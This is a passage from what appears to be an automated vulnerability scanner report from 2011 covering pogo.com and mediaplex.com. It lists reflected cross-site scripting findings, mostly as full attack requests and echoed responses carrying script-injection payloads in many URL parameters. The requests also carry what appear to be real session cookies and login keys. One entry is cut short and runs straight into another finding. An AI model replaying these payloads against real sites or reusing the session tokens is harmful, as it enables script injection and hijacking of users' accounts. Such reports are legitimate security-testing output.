Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 864

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=1eecd"><script>alert(1)</script>32bc7416dcb&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.504. http://game3.pogo.com/room/loading/jvmtest.jsp [ahst parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6724c"><script>alert(1)</script>42c19f207ae was submitted in the ahst parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com6724c"><script>alert(1)</script>42c19f207ae&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 1457

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<applet mayscript="true" width="0" height="0" code="com.pogo.client.jvmtest.Applet" codebase="http://game3.pogo.com6724c"><script>alert(1)</script>42c19f207ae/v/11.1.9.44/applet/jvmtest/" archive="jvmtest-en_US.jar">
...[SNIP]...

3.505. http://game3.pogo.com/room/loading/jvmtest.jsp [anam parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4401e"><script>alert(1)</script>8b4c56b51c1 was submitted in the anam parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+1024401e"><script>alert(1)</script>8b4c56b51c1&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+1024401e"><script>alert(1)</script>8b4c56b51c1&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow">
...[SNIP]...

3.506. http://game3.pogo.com/room/loading/jvmtest.jsp [apid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e635"><script>alert(1)</script>005bf7ed2bc was submitted in the apid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules1e635"><script>alert(1)</script>005bf7ed2bc&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules1e635"><script>alert(1)</script>005bf7ed2bc&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow">
...[SNIP]...

3.507. http://game3.pogo.com/room/loading/jvmtest.jsp [auto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b03"><script>alert(1)</script>8edfae6e7ac was submitted in the auto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:36 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
m/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac">
...[SNIP]...

3.508. http://game3.pogo.com/room/loading/jvmtest.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13d1"><script>alert(1)</script>a7b4af90121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&e13d1"><script>alert(1)</script>a7b4af90121=1 HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:37 GMT
Server: Apache-Coyote/1.1
Content-Length: 1417

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&e13d1"><script>alert(1)</script>a7b4af90121=1">
...[SNIP]...

3.509. http://game3.pogo.com/room/loading/jvmtest.jsp [rhst parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c459"><script>alert(1)</script>145a3e0d196 was submitted in the rhst parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com9c459"><script>alert(1)</script>145a3e0d196&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
aram name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com9c459"><script>alert(1)</script>145a3e0d196&game=scrabble&auto=PlayNow">
...[SNIP]...

3.510. http://game3.pogo.com/room/loading/jvmtest.jsp [rspt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8e12"><script>alert(1)</script>5e44d514793 was submitted in the rspt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909d8e12"><script>alert(1)</script>5e44d514793&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909d8e12"><script>alert(1)</script>5e44d514793&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow">
...[SNIP]...

3.511. http://game3.pogo.com/room/loading/jvmtest.jsp [scrn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fd3"><script>alert(1)</script>cca616bfa9d was submitted in the scrn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k724068fd3"><script>alert(1)</script>cca616bfa9d&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k724068fd3"><script>alert(1)</script>cca616bfa9d&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow">
...[SNIP]...

3.512. http://game3.pogo.com/room/loading/jvmtest.jsp [ugifts parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/jvmtest.jsp

Issue detail

The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c99"><script>alert(1)</script>43258050f9e was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=075c99"><script>alert(1)</script>43258050f9e&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 1414

<html>

<script type="text/javascript">
   function show(dest) {
       if (top.window.opener) {
           top.window.opener.location.replace(dest);
           top.window.close();
       }
       else {
           top.window.
...[SNIP]...
<param name="url" value="/room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=075c99"><script>alert(1)</script>43258050f9e&rhst=www.pogo.com&game=scrabble&auto=PlayNow">
...[SNIP]...

3.513. http://game3.pogo.com/room/loading/loading.jsp [ahst parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/loading.jsp

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a4f"%3balert(1)//e973b8a1d5f was submitted in the mpck parameter. This input was echoed as 25a4f";alert(1)//e973b8a1d5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D333452725a4f"%3balert(1)//e973b8a1d5f&mpt=3334527&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT
ETag: "36e97-a5f-45a537df77f40"
Accept-Ranges: bytes
Content-Length: 3014
Content-Type: application/x-javascript

var mp_swver = 0;

var mp_html = "";
if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) {
if( na
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=333452725a4f";alert(1)//e973b8a1d5f\" TARGET=\"_blank\">
...[SNIP]...

3.517. http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca6f3"%3balert(1)//565e2651fa8 was submitted in the mpvc parameter. This input was echoed as ca6f3";alert(1)//565e2651fa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc=ca6f3"%3balert(1)//565e2651fa8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
